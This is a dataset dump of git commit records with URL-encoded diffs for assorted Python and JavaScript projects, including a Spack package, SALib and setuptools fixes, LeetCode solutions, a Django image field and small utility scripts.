Dataset schema:

  field         dtype          range
  commit        stringlengths  40 to 40
  subject       stringlengths  1 to 3.25k
  old_file      stringlengths  4 to 311
  new_file      stringlengths  4 to 311
  old_contents  stringlengths  0 to 26.3k
  lang          stringclasses  3 values
  proba         float64        0 to 1
  diff          stringlengths  0 to 7.82k
eff5016653980f24c5c55dfb866dbe108f50dedf
Add the cbtf Spack build package. cbtf is the base package for the component-based tool framework (CBTF) and is used for building and connecting CBTF components, including distributed components via the MRNet transfer mechanism.
var/spack/packages/cbtf/package.py
var/spack/packages/cbtf/package.py
Python
0
@@ -0,0 +1,2719 @@ +################################################################################%0A# Copyright (c) 2015 Krell Institute. All Rights Reserved.%0A#%0A# This program is free software; you can redistribute it and/or modify it under%0A# the terms of the GNU General Public License as published by the Free Software%0A# Foundation; either version 2 of the License, or (at your option) any later%0A# version.%0A#%0A# This program is distributed in the hope that it will be useful, but WITHOUT%0A# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS%0A# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more%0A# details.%0A#%0A# You should have received a copy of the GNU General Public License along with%0A# this program; if not, write to the Free Software Foundation, Inc., 59 Temple%0A# Place, Suite 330, Boston, MA 02111-1307 USA%0A################################################################################%0A%0Afrom spack import *%0A%0Aclass Cbtf(Package):%0A %22%22%22CBTF project contains the base code for CBTF that supports creating components, %0A component networks and the support to connect these components and component %0A networks into sequential and distributed network tools.%22%22%22%0A homepage = %22http://sourceforge.net/p/cbtf/wiki/Home%22%0A%0A url = %22http://sourceforge.net/projects/cbtf/files/cbtf-1.5/cbtf-1.5.tar.gz/download%22%0A version('1.5', '75a97e0161d19b3a12305ed1ffb3d3e2')%0A%0A # Mirror access template example%0A #url = %22file:/opt/spack-mirror-2015-02-27/cbtf/cbtf-1.5.tar.gz%22%0A #version('1.5', '1ca88a8834759c4c74452cb97fe7b70a')%0A%0A # Use when the git repository is available%0A #version('1.5', branch='master', git='http://git.code.sf.net/p/cbtf/cbtf')%0A%0A depends_on(%22cmake%22)%0A depends_on(%[email protected]:%22)%0A depends_on(%[email protected]+krelloptions%22)%0A depends_on(%[email protected]:%22)%0A depends_on(%22libxml2%22)%0A%0A parallel = False%0A%0A def install(self, spec, prefix):%0A with working_dir('build', create=True):%0A%0A%0A # Boost_NO_SYSTEM_PATHS Set to TRUE to suppress searching %0A # in system paths (or other locations outside of BOOST_ROOT%0A # or BOOST_INCLUDEDIR). Useful when specifying BOOST_ROOT. %0A # Defaults to OFF.%0A%0A cmake('..',%0A '--debug-output',%0A '-DBoost_NO_SYSTEM_PATHS=TRUE',%0A '-DXERCESC_DIR=%25s' %25 spec%5B'xerces-c'%5D.prefix,%0A '-DBOOST_ROOT=%25s' %25 spec%5B'boost'%5D.prefix,%0A '-DMRNET_DIR=%25s' %25 spec%5B'mrnet'%5D.prefix,%0A '-DCMAKE_MODULE_PATH=%25s' %25 join_path(prefix.share,'KrellInstitute','cmake'),%0A *std_cmake_args)%0A%0A make(%22clean%22)%0A make()%0A make(%22install%22)%0A
8faaee841f613753515e31c2e5d269222fccf898
fix doc typo (default interference parameter)
SALib/analyze/rbd_fast.py
SALib/analyze/rbd_fast.py
#!/usr/bin/env python # coding=utf8 from __future__ import division from __future__ import print_function import numpy as np from scipy.signal import periodogram from . import common_args from ..util import read_param_file def analyze(problem, Y, X, M=10, print_to_console=False): """Performs the Random Balanced Design - Fourier Amplitude Sensitivity Test (RBD-FAST) on model outputs. Returns a dictionary with keys 'S1', where each entry is a list of size D (the number of parameters) containing the indices in the same order as the parameter file. Parameters ---------- problem : dict The problem definition Y : numpy.array A NumPy array containing the model outputs X : numpy.array A NumPy array containing the model inputs M : int The interference parameter, i.e., the number of harmonics to sum in the Fourier series decomposition (default 4) print_to_console : bool Print results directly to console (default False) References ---------- .. [1] S. Tarantola, D. Gatelli and T. Mara (2006) "Random Balance Designs for the Estimation of First Order Global Sensitivity Indices", Reliability Engineering and System Safety, 91:6, 717-727 .. [2] Elmar Plischke (2010) "An effective algorithm for computing global sensitivity indices (EASI) Reliability Engineering & System Safety", 95:4, 354-360. doi:10.1016/j.ress.2009.11.005 .. [3] Jean-Yves Tissot, Clémentine Prieur (2012) "Bias correction for the estimation of sensitivity indices based on random balance designs.", Reliability Engineering and System Safety, Elsevier, 107, 205-213. doi:10.1016/j.ress.2012.06.010 .. [4] Jeanne Goffart, Mickael Rabouille & Nathan Mendes (2015) "Uncertainty and sensitivity analysis applied to hygrothermal simulation of a brick building in a hot and humid climate", Journal of Building Performance Simulation. doi:10.1080/19401493.2015.1112430 Examples -------- >>> X = latin.sample(problem, 1000) >>> Y = Ishigami.evaluate(X) >>> Si = rbd_fast.analyze(problem, Y, X, print_to_console=False) """ D = problem['num_vars'] N = Y.size # Calculate and Output the First Order Value if print_to_console: print("Parameter First") Si = dict((k, [None] * D) for k in ['S1']) for i in range(D): S1 = compute_first_order(permute_outputs(Y, X[:, i]), M) S1 = unskew_S1(S1, M, N) Si['S1'][i] = S1 if print_to_console: print("%s %g" % (problem['names'][i].ljust(9), Si['S1'][i])) return Si def permute_outputs(Y, X): """ Permute the output according to one of the inputs (Elmar Plischke (2010) "An effective algorithm for computing global sensitivity indices (EASI) Reliability Engineering & System Safety", 95:4, 354-360. doi:10.1016/j.ress.2009.11.005) """ permutation_index = np.argsort(X) permutation_index = np.concatenate([permutation_index[::2], permutation_index[1::2][::-1]]) return Y[permutation_index] def compute_first_order(permuted_outputs, M): _, Pxx = periodogram(permuted_outputs) V = np.sum(Pxx[1:]) D1 = np.sum(Pxx[1: M + 1]) return D1 / V def unskew_S1(S1, M, N): """ Unskew the sensivity indice (Jean-Yves Tissot, Clémentine Prieur (2012) "Bias correction for the estimation of sensitivity indices based on random balance designs.", Reliability Engineering and System Safety, Elsevier, 107, 205-213. doi:10.1016/j.ress.2012.06.010) """ lamb = (2 * M) / N return S1 - lamb / (1 - lamb) * (1 - S1) if __name__ == "__main__": parser = common_args.create() parser.add_argument('-X', '--model-input-file', type=str, required=True, help='Model input file') args = parser.parse_args() problem = read_param_file(args.paramfile) Y = np.loadtxt(args.model_output_file, delimiter=args.delimiter, usecols=(args.column,)) X = np.loadtxt(args.model_input_file, delimiter=args.delimiter) analyze(problem, Y, X, print_to_console=True)
Python
0
@@ -961,17 +961,18 @@ default -4 +10 )%0D%0A p
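The one-character doc fix above aligns the documented default with the signature (M=10). For reference, the bias correction the file applies in unskew_S1 (Tissot & Prieur 2012) is S1 - lamb/(1 - lamb) * (1 - S1) with lamb = 2M/N; a standalone check of the formula, using illustrative values for N and the biased index (assumptions, not from the commit):

# Standalone check of the RBD-FAST bias correction from unskew_S1.
# M matches the corrected default; N and S1_biased are illustrative.
M, N = 10, 1000
S1_biased = 0.32
lamb = (2 * M) / N                          # lambda = 2M/N
S1 = S1_biased - lamb / (1 - lamb) * (1 - S1_biased)
print(round(S1, 4))                         # 0.3061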
fc21bb14600f79a3d9970272fb7edd4eba548262
Add test for Python runner action wrapper process script performance.
st2actions/tests/integration/test_python_action_process_wrapper.py
st2actions/tests/integration/test_python_action_process_wrapper.py
Python
0
@@ -0,0 +1,2639 @@ +# Licensed to the StackStorm, Inc ('StackStorm') under one or more%0A# contributor license agreements. See the NOTICE file distributed with%0A# this work for additional information regarding copyright ownership.%0A# The ASF licenses this file to You under the Apache License, Version 2.0%0A# (the %22License%22); you may not use this file except in compliance with%0A# the License. You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A%0A%22%22%22%0ATest case which tests that Python runner action wrapper finishes in %3C= 200ms. If the process takes%0Amore time to finish, this means it probably directly or in-directly imports some modules which have%0Aside affects and are very slow to import.%0A%0AExamples of such modules include:%0A* jsonschema%0A* pecan%0A* jinja2%0A* kombu%0A* mongoengine%0A%0AIf the tests fail, look at the recent changes and analyze the import graph using the following%0Acommand: %22profimp %22from st2common.runners import python_action_wrapper%22 --html %3E report.html%22%0A%22%22%22%0A%0Aimport os%0A%0Aimport unittest2%0A%0Afrom st2common.util.shell import run_command%0A%0A# Maximum limit for the process wrapper script execution time (in seconds)%0AWRAPPER_PROCESS_RUN_TIME_UPPER_LIMIT = 0.35%0A%0AASSERTION_ERROR_MESSAGE = (%22%22%22%0APython wrapper process script took more than %25s seconds to execute (%25s). This most likely means%0Athat a direct or in-direct import of a module which takes a long time to load has been added (e.g.%0Ajsonschema, pecan, kombu, etc).%0A%0APlease review recently changed and added code for potential slow import issues and refactor /%0Are-organize code if possible.%0A%22%22%22.strip())%0A%0ABASE_DIR = os.path.dirname(os.path.abspath(__file__))%0AWRAPPER_SCRIPT_PATH = os.path.join(BASE_DIR, '../../st2common/runners/python_action_wrapper.py')%0A%0A%0Aclass PythonRunnerActionWrapperProcess(unittest2.TestCase):%0A def test_process_wrapper_exits_in_reasonable_timeframe(self):%0A _, _, stderr = run_command('/usr/bin/time -f %22%25%25e%22 python %25s' %25 (WRAPPER_SCRIPT_PATH),%0A shell=True)%0A%0A stderr = stderr.strip().split('%5Cn')%5B-1%5D%0A%0A run_time_seconds = float(stderr)%0A assertion_msg = ASSERTION_ERROR_MESSAGE %25 (WRAPPER_PROCESS_RUN_TIME_UPPER_LIMIT,%0A run_time_seconds)%0A self.assertTrue(run_time_seconds %3C= WRAPPER_PROCESS_RUN_TIME_UPPER_LIMIT, assertion_msg)%0A
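The test reads the child's wall-clock time from GNU time's -f output on stderr. A more portable sketch of the same measurement (an assumption, not the project's code) needs only the standard library:

# Portable wall-clock timing of a child Python process, avoiding
# the GNU-specific '/usr/bin/time -f' invocation used in the test.
import subprocess
import sys
import time

def measure_run_time(script_path):
    start = time.time()
    subprocess.call([sys.executable, script_path])
    return time.time() - start

# e.g.: assert measure_run_time(WRAPPER_SCRIPT_PATH) <= 0.35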
c6df42ca99c8f633c2f1efeb9af26ad4b88c4d75
Create 04.py
02/hw/04.py
02/hw/04.py
Python
0
@@ -0,0 +1,801 @@ +# Define a procedure, find_last, that takes as input%0A# two strings, a search string and a target string,%0A# and returns the last position in the search string%0A# where the target string appears, or -1 if there%0A# are no occurences.%0A#%0A# Example: find_last('aaaa', 'a') returns 3%0A%0A# Make sure your procedure has a return statement.%0A%0Adef find_last(search, target):%0A ii = 0%0A ans = -1%0A while ii %3E= 0:%0A ii = search.find(target, ii)%0A if ii != -1:%0A ans = ii%0A ii = ii + 1 %0A return ans%0A%0A#print find_last('aaaa', 'a')%0A#%3E%3E%3E 3%0A%0A#print find_last('aaaaa', 'aa')%0A#%3E%3E%3E 3%0A%0A#print find_last('aaaa', 'b')%0A#%3E%3E%3E -1%0A%0A#print find_last(%22111111111%22, %221%22)%0A#%3E%3E%3E 8%0A%0A#print find_last(%22222222222%22, %22%22)%0A#%3E%3E%3E 9%0A%0A#print find_last(%22%22, %223%22)%0A#%3E%3E%3E -1%0A%0A#print find_last(%22%22, %22%22)%0A#%3E%3E%3E 0%0A%0A%0A%0A%0A
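The loop above rescans with str.find until it fails; the standard library's str.rfind already returns the last occurrence, or -1 on a miss, so a minimal equivalent (for comparison, not part of the commit) is:

# Built-in equivalent: str.rfind returns the highest index at which
# target occurs in search, or -1 if it never occurs.
def find_last(search, target):
    return search.rfind(target)

assert find_last('aaaa', 'a') == 3
assert find_last('aaaaa', 'aa') == 3
assert find_last('aaaa', 'b') == -1
assert find_last('', '') == 0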
ba0093c8b6801bdbded870ea5cc27eeec05abb58
create db script
web/create_db.py
web/create_db.py
Python
0.000001
@@ -0,0 +1,807 @@ +__author__ = 'David Mitchell'%0A#This script creates an example/test db.%0A%0Afrom app import db%0Afrom app import MenuCategory, MenuItem%0A%0Adb.drop_all()%0Adb.create_all()%0A%0Aappetizer_category = MenuCategory(name='Appetizers')%0Aentree_category = MenuCategory(name='Entrees')%0Adesert_category = MenuCategory(name='Deserts')%0Abacon_item = MenuItem(name='Bacon', description='Delicious bacon', category=appetizer_category)%0Abaconz_item = MenuItem(name='Baconz', description='Bacon with Bacon on top, fried in a bacon crust', category=entree_category)%0AbaconIceCream_item = MenuItem(name='Bacon Ice Cream', description='Bacon Ice Cream topped with bacon bits', category=desert_category)%0A%0Adb.session.add_all(%5Bappetizer_category, entree_category, desert_category, bacon_item, baconz_item, baconIceCream_item%5D)%0Adb.session.commit()%0A
955a2a7e467cdcf83a19525e421feb9a5eaca7e3
Add huxley/js.py for javascript
huxley/js.py
huxley/js.py
Python
0
@@ -0,0 +1,1252 @@ +# Copyright (c) 2013 Facebook%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22);%0A# you may not use this file except in compliance with the License.%0A# You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or impliedriver.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A%0A%22%22%22%0AJavaScript to be executed in the testing user agent.%0A%22%22%22%0A%0A%0AgetHuxleyEvents = %22%22%22%0A(function() %7B%0A var events = %5B%5D;%0A%0A window.addEventListener(%0A 'click',%0A function (e) %7B events.push(%5BDate.now(), 'click', %5Be.clientX, e.clientY%5D%5D); %7D,%0A true%0A );%0A window.addEventListener(%0A 'keyup',%0A function (e) %7B events.push(%5BDate.now(), 'keyup', String.fromCharCode(e.keyCode)%5D); %7D,%0A true%0A );%0A window.addEventListener(%0A 'scroll',%0A function(e) %7B events.push(%5BDate.now(), 'scroll', %5Bthis.pageXOffset, this.pageYOffset%5D%5D); %7D,%0A true%0A );%0A%0A window._getHuxleyEvents = function() %7B return events %7D;%0A%7D)();%0A%22%22%22
79710bb5b77b8cfa95d92f7f39ac44fc0c605022
Create featureCC.py
featureCC.py
featureCC.py
Python
0
@@ -0,0 +1,2285 @@ +### *- Program: FeatureCC%0A### *- Objective: To determine the total number of point, line, and polygon shapefiles%0A### in a directory%0A### *- Input: Provided by the user (workspace)%0A### *- Output: Display total files for point, line, and polygon shapefiles to the user%0A%0A# - START PROGRAM -%0A%0A# Import OS module to load appropriate paths depending on which system is being used%0Aimport os%0A%0A# Import ArcPy module to use built-in functions to achieve the program objective%0Aimport arcpy%0A# From ArcPy, import the environment/workspace%0Afrom arcpy import env%0A%0A# Ask the user to input a file path to set as a workspace%0Aenv.workspace = raw_input(%22%5CnPlease enter your file path: %22)%0A# Assign the workspace to a new variable%0AfilePath = env.workspace%0A%0Ax = 0%0Awhile x %3C 1: # Set up a file validation system %0A if os.path.exists(filePath): # If file path, exists: continue. Otherwise..%0A x = 1 # ..go to Line 45%0A %0A point = arcpy.ListFeatureClasses(%22*%22, %22Point%22) # List point feature classes%0A line = arcpy.ListFeatureClasses(%22*%22, %22Line%22) # List line feature classes%0A poly = arcpy.ListFeatureClasses(%22*%22, %22Polygon%22) # List polygon feature classes%0A %0A pointCount = len(point) # Count the number of point feature classes%0A lineCount = len(line) # Count the number of line feature classes%0A polyCount = len(poly) # Count the number of polygon feature classes%0A %0A print(%22%5CnPOINTS:%22), pointCount, (%22files%22) # Print total for point feature classes %0A print(%22LINES:%22), lineCount, (%22files%22) # Print total for line feature classes%0A print(%22POLYGONS:%22), polyCount, (%22files%5Cn%22) # Print total for polygon feature classes%0A %0A else:%0A raw_input(%22%5Cn!ERROR! - File path does not exist.%22 # If file path does not exist..%0A %22%5CnPress Enter to continue. %22) # ..display an error message..%0A env.workspace = raw_input(%22%5CnPlease enter your file path: %22) # ..and ask user to..%0A filePath = env.workspace # ..enter it again%0A%0A# Import time module and exit the program in 10 seconds%0Aimport time%0Atime.sleep(10)%0A%0A# - END PROGRAM -%0A%0A# I'm gonna make him an offer he can't refuse%0A# - Don Vito Corleone (The Godfather)%0A
61fa5c26b9b2eff24e88313671c7aa673e24bb0f
Create pythagoras.py
pythagoras.py
pythagoras.py
Python
0.000003
@@ -0,0 +1,198 @@ +#!/bin/python%0Afrom math import sqrt %0A%0Aprint %22a%5E2 + b%5E2 = c%5E2%22%0A%0Aleg1 = raw_input(%22Leg1 (a): %22)%0Aleg2 = raw_input(%22Leg2 (b): %22)%0A%0Ahypotenuse = sqrt((int(leg1) ** 2) + (int(leg2) ** 2))%0Aprint hypotenuse%0A
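The script is Python 2 (print statements, raw_input). A Python 3 port of the same calculation, as a sketch rather than part of the commit:

#!/usr/bin/env python3
# Python 3 port: print() and input() replace the Python 2 forms.
from math import sqrt

print("a^2 + b^2 = c^2")
leg1 = int(input("Leg1 (a): "))
leg2 = int(input("Leg2 (b): "))
print(sqrt(leg1 ** 2 + leg2 ** 2))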
c1bed8533d479112df6ae4aea0bb31e4419ae4f8
change location of jianfan lib in data repo
setup/setupdev.py
setup/setupdev.py
#!/usr/bin/env python # -*- coding:utf-8 -*- import os import shutil """ $PALI_DIR is the dir of git clone https://github.com/siongui/pali.git Manual setup (for reference): 1. setup TongWen (deprecated): ```bash cd $PALI_DIR mkdir -p common/app/scripts/ext cd common/app/scripts/ext/ wget http://tongwen.openfoundry.org/src/web/tongwen_core.js wget http://tongwen.openfoundry.org/src/web/tongwen_table_s2t.js wget http://tongwen.openfoundry.org/src/web/tongwen_table_t2s.js wget http://tongwen.openfoundry.org/src/web/tongwen_table_ps2t.js wget http://tongwen.openfoundry.org/src/web/tongwen_table_pt2s.js ``` 2. setup jianfan (deprecated): ```bash wget https://python-jianfan.googlecode.com/files/jianfan-0.0.2.zip unzip jianfan-0.0.2.zip mv jianfan-0.0.2/jianfan $PALI_DIR/common/pylib/ rm -rf jianfan-0.0.2 ``` 3. create symbolic links: ```bash cd $PALI_DIR/tipitaka ln -s ../common/ common cd $PALI_DIR/tipitaka/pylib ln -s ../../../data/pali/common/translation/ translation ln -s ../../../data/pali/common/romn/ romn cd $PALI_DIR/dictionary ln -s ../common/ common cd $PALI_DIR/common/pylib ln -s ../../../data/pali/common/gae/libs/jianfan/ jianfan ``` """ def ln(source, link_name): if os.path.islink(link_name): os.unlink(link_name) os.symlink(source, link_name) def setupSymlinks(): # enter tipitaka dir os.chdir(os.path.join(os.path.dirname(__file__), '../tipitaka')) ln('../common/', 'common') os.chdir('pylib') ln('../../../data/pali/common/translation/', 'translation') ln('../../../data/pali/common/romn/', 'romn') # enter dictionary dir os.chdir('../../dictionary') ln('../common/', 'common') # enter common dir os.chdir('../common/pylib') ln('../../../data/pali/common/gae/libs/jianfan/', 'jianfan') if __name__ == '__main__': tipitakaLatnCssPath = os.path.join(os.path.dirname(__file__), '../../data/pali/common/romn/cscd/tipitaka-latn.css') dstPath = os.path.join(os.path.dirname(__file__), '../tipitaka/app/css/tipitaka-latn.css') shutil.copyfile(tipitakaLatnCssPath, dstPath) setupSymlinks()
Python
0
@@ -1160,35 +1160,20 @@ ./data/p -ali/common/gae/ +y lib -s /jianfan @@ -1741,27 +1741,12 @@ ta/p -ali/common/gae/ +y lib -s /jia
7b09ba64c0327ecea04cc95057ffa7d5c8d939c8
Add test for setopt to demonstrate that edit_config retains non-ASCII characters.
setuptools/tests/test_setopt.py
setuptools/tests/test_setopt.py
Python
0
@@ -0,0 +1,1072 @@ +# coding: utf-8%0A%0Afrom __future__ import unicode_literals%0A%0Aimport io%0A%0Aimport six%0A%0Afrom setuptools.command import setopt%0Afrom setuptools.extern.six.moves import configparser%0A%0A%0Aclass TestEdit:%0A @staticmethod%0A def parse_config(filename):%0A parser = configparser.ConfigParser()%0A with io.open(filename, encoding='utf-8') as reader:%0A (parser.read_file if six.PY3 else parser.readfp)(reader)%0A return parser%0A%0A @staticmethod%0A def write_text(file, content):%0A with io.open(file, 'wb') as strm:%0A strm.write(content.encode('utf-8'))%0A%0A def test_utf8_encoding_retained(self, tmpdir):%0A %22%22%22%0A When editing a file, non-ASCII characters encoded in%0A UTF-8 should be retained.%0A %22%22%22%0A config = tmpdir.join('setup.cfg')%0A self.write_text(config, '%5Bnames%5D%5Cnjaraco=%D0%B9%D0%B0%D1%80%D0%B0%D1%86%D0%BE')%0A setopt.edit_config(str(config), dict(names=dict(other='yes')))%0A parser = self.parse_config(str(config))%0A assert parser%5B'names'%5D%5B'jaraco'%5D == '%D0%B9%D0%B0%D1%80%D0%B0%D1%86%D0%BE'%0A assert parser%5B'names'%5D%5B'other'%5D == 'yes'%0A
cbf0d257bcbaeddeb9390047f575038b5d842dc8
update version
paginator_plus/__init__.py
paginator_plus/__init__.py
Python
0
@@ -0,0 +1,48 @@ +# -*- coding: utf-8 -*-%0A%0A%0A__version__ = '0.0.1'%0A
dc5e87f4a7bb1399951423c3a4236c58ab723665
change AjaxImageField to behave like standard django FileField
ajaximage/fields.py
ajaximage/fields.py
#-*- coding: utf-8 -*- from django.db.models import Field from django.forms import widgets from ajaximage.widgets import AjaxImageEditor from django.conf import settings class AjaxImageField(Field): def __init__(self, *args, **kwargs): upload_to = kwargs.pop('upload_to', '') max_height = kwargs.pop('max_height', 0) max_width = kwargs.pop('max_width', 0) crop = kwargs.pop('crop', False) crop = 1 if crop is True else 0 if(crop is 1 and (max_height is 0 or max_width is 0)): raise Exception('Both max_width and max_height are needed if cropping') self.widget = AjaxImageEditor(upload_to=upload_to, max_width=max_width, max_height=max_height, crop=crop) super(AjaxImageField, self).__init__(*args, **kwargs) def get_internal_type(self): return "TextField" def formfield(self, **kwargs): defaults = {'widget': self.widget} defaults.update(kwargs) return super(AjaxImageField, self).formfield(**defaults) if 'south' in settings.INSTALLED_APPS: from south.modelsinspector import add_introspection_rules add_introspection_rules([], ["^ajaximage\.fields\.AjaxImageField"])
Python
0
@@ -32,173 +32,350 @@ ngo. -db.models import Field%0Afrom django.forms import widgets +core.files.storage import default_storage%0Afrom django.db.models.fields.files import FileDescriptor, FieldFile %0Afrom -ajaximage.widgets import AjaxImageEditor%0Afrom django.conf import settings%0A%0A%0Aclass AjaxImageField(Field): +django.db.models import Field%0Afrom django.conf import settings%0Afrom .widgets import AjaxImageEditor%0A%0A%0Aclass AjaxImageField(Field):%0A%0A storage = default_storage%0A attr_class = FieldFile%0A descriptor_class = FileDescriptor%0A %0A @@ -637,24 +637,16 @@ else 0%0A - %0A @@ -648,17 +648,17 @@ if -( + crop is @@ -698,17 +698,16 @@ th is 0) -) :%0A @@ -823,16 +823,29 @@ eEditor( +%0A upload_t @@ -873,54 +873,62 @@ - max_width=max_width +max_width=max_width,%0A max_height=max_height ,%0A @@ -933,32 +933,42 @@ +crop=crop%0A @@ -951,32 +951,34 @@ rop%0A +)%0A m @@ -969,192 +969,549 @@ - max_height=max_height,%0A crop=crop)%0A %0A super(AjaxImageField, self).__init__(*args, **kwargs +super(AjaxImageField, self).__init__(*args, **kwargs)%0A%0A def contribute_to_class(self, cls, name, virtual_only=False):%0A super(AjaxImageField, self).contribute_to_class(cls, name, virtual_only)%0A setattr(cls, self.name, self.descriptor_class(self))%0A%0A def get_prep_value(self, value):%0A %22%22%22Returns field's value prepared for saving into a database.%22%22%22%0A # Need to convert File objects provided via a form to unicode for database insertion%0A if value is None:%0A return None%0A return str(value )%0A%0A
2a963c4d13035b6f8e301a7f0240b28e0e0764d3
Create WordLadder_001.py
leetcode/127-Word-Ladder/WordLadder_001.py
leetcode/127-Word-Ladder/WordLadder_001.py
Python
0
@@ -0,0 +1,910 @@ +class Solution(object):%0A def ladderLength(self, beginWord, endWord, wordList):%0A %22%22%22%0A :type beginWord: str%0A :type endWord: str%0A :type wordList: Set%5Bstr%5D%0A :rtype: int%0A %22%22%22%0A if beginWord == endWord:%0A return 1%0A %0A cnt = 1%0A q = %5BbeginWord%5D%0A %0A while q:%0A nq = %5B%5D%0A for word in q:%0A for i in range(len(beginWord)):%0A for j in 'abcdefghijklmnopqrstuvwxyz':%0A if j != word%5Bi%5D:%0A nword = word%5B:i%5D + j + word%5Bi + 1:%5D%0A if nword == endWord:%0A return cnt + 1%0A if nword in wordList:%0A nq.append(nword)%0A wordList.remove(nword)%0A cnt += 1%0A q = nq%0A return 0%0A
c657d92f1f8dc3cd4ff9995dc0d2857ce8f6fdd4
Create CountingBits.py
leetcode/338-Counting-Bits/CountingBits.py
leetcode/338-Counting-Bits/CountingBits.py
Python
0.000001
@@ -0,0 +1,330 @@ +class Solution(object):%0A def countBits(self, num):%0A %22%22%22%0A :type num: int%0A :rtype: List%5Bint%5D%0A %22%22%22%0A seed = 1%0A res = %5B0%5D%0A %0A while num %3E 0:%0A res += %5Bres%5Bi%5D + 1 for i in xrange(min(num, seed))%5D%0A num -= seed%0A seed = seed %3C%3C 1%0A return res%0A
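The solution grows the table in doubling-size blocks, each block being the previous prefix plus one. The same O(num) table is often built with the recurrence popcount(i) = popcount(i >> 1) + (i & 1); a sketch for comparison:

# DP over the bit-shift recurrence: i >> 1 drops the lowest bit of i,
# so popcount(i) = popcount(i >> 1) + (i & 1).
def count_bits(num):
    res = [0] * (num + 1)
    for i in range(1, num + 1):
        res[i] = res[i >> 1] + (i & 1)
    return res

assert count_bits(5) == [0, 1, 1, 2, 1, 2]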
0cd5ed79f019db91261c0d858b61796021ec3f80
Add syntax highlighting tests for PEP 570
test/highlight/parameters.py
test/highlight/parameters.py
Python
0
@@ -0,0 +1,99 @@ +def g(h, i, /, j, *, k=100, **kwarg):%0A # %5E operator%0A # %5E operator%0A pass%0A
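For context on what the highlight test exercises: PEP 570 added the / marker, so in def g(h, i, /, j, *, k=100, **kwarg) the parameters h and i are positional-only, while k is keyword-only. A quick illustration:

# PEP 570 semantics for the signature used in the test above.
def g(h, i, /, j, *, k=100, **kwarg):
    return (h, i, j, k)

print(g(1, 2, 3, k=4))   # ok: (1, 2, 3, 4)
# g(h=1, i=2, j=3)       # TypeError: h and i are positional-only
# g(1, 2, 3, 4)          # TypeError: k is keyword-only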
511c8049c0b6bd12fd30550c2ffa2ec86341ef4f
version 0.1 added to the repo
fetch_remote_data/__init__.py
fetch_remote_data/__init__.py
Python
0
@@ -0,0 +1,18 @@ +__version__=%220.1%22%0A
bf6c8ce59ec841b19dab3a02a9065864035d4d82
Add a new helper to convert stackalytics default_data.json
bin/helpers/openstack/stackalytics.py
bin/helpers/openstack/stackalytics.py
Python
0.00006
@@ -0,0 +1,2407 @@ +import sys%0Aimport json%0Aimport yaml%0Aimport datetime%0A%0A# Read default_data.json from stackalytics/etc/ and convert for%0A# repoXplorer.%0A%0Aif __name__ == %22__main__%22:%0A ident = %7B'identities': %7B%7D,%0A 'groups': %7B%7D%7D%0A data = json.loads(file(sys.argv%5B1%5D).read())%0A users = data%5B'users'%5D%0A groups = data%5B'companies'%5D%0A i = ident%5B'identities'%5D%0A g = ident%5B'groups'%5D%0A gstore = %7B%7D%0A for group in groups:%0A gstore%5Bgroup%5B'company_name'%5D%5D = group%5B'domains'%5D%0A for user in users:%0A try:%0A i%5Buser%5B'launchpad_id'%5D%5D = %7B%7D%0A iu = i%5Buser%5B'launchpad_id'%5D%5D%0A except:%0A try:%0A i%5Buser%5B'github_id'%5D%5D = %7B%7D%0A iu = i%5Buser%5B'github_id'%5D%5D%0A except:%0A continue%0A sys.stdout.write('.')%0A iu%5B'name'%5D = user%5B'user_name'%5D%0A iu%5B'default-email'%5D = user%5B'emails'%5D%5B0%5D%0A iu%5B'emails'%5D = %7B%7D%0A for email in user%5B'emails'%5D:%0A iu%5B'emails'%5D.setdefault(email, %7B%7D)%0A histo = %5B%5D%0A for c in user%5B'companies'%5D:%0A iu%5B'emails'%5D%5Bemail%5D.setdefault('groups', %7B%7D)%0A iu%5B'emails'%5D%5Bemail%5D%5B'groups'%5D%5Bc%5B'company_name'%5D%5D = %7B%7D%0A # cd = iu%5B'emails'%5D%5Bemail%5D%5B'groups'%5D%5Bc%5B'company_name'%5D%5D%0A g.setdefault(%0A c%5B'company_name'%5D, %7B%0A 'description': '',%0A 'emails': %7B%7D,%0A 'domains': gstore.get(c%5B'company_name'%5D, %5B%5D)%0A %7D)%0A if c%5B'end_date'%5D is not None:%0A end_date_raw = datetime.datetime.strptime(%0A c%5B'end_date'%5D, '%25Y-%25b-%25d')%0A histo.append(%5BNone, end_date_raw, c%5B'company_name'%5D%5D)%0A else:%0A histo.append(%5BNone, None, c%5B'company_name'%5D%5D)%0A histo.sort(key=lambda tup: tup%5B1%5D or datetime.datetime.today())%0A for z, h in enumerate(histo):%0A if z == 0:%0A pass%0A h%5B0%5D = histo%5Bz-1%5D%5B1%5D%0A cd = iu%5B'emails'%5D%5Bemail%5D%5B'groups'%5D%5Bh%5B2%5D%5D%0A if h%5B0%5D:%0A cd%5B'begin-date'%5D = h%5B0%5D.strftime('%25Y-%25m-%25d')%0A if h%5B1%5D:%0A cd%5B'end-date'%5D = h%5B1%5D.strftime('%25Y-%25m-%25d')%0A%0A path = 'test.yaml'%0A with open(path, 'w') as fd:%0A fd.write(yaml.safe_dump(ident,%0A default_flow_style=False))%0A
367a1ff9f0ca3daae3ee804b5484e3863bb72307
Add initial proposal tests
tests/views/test_proposal.py
tests/views/test_proposal.py
Python
0
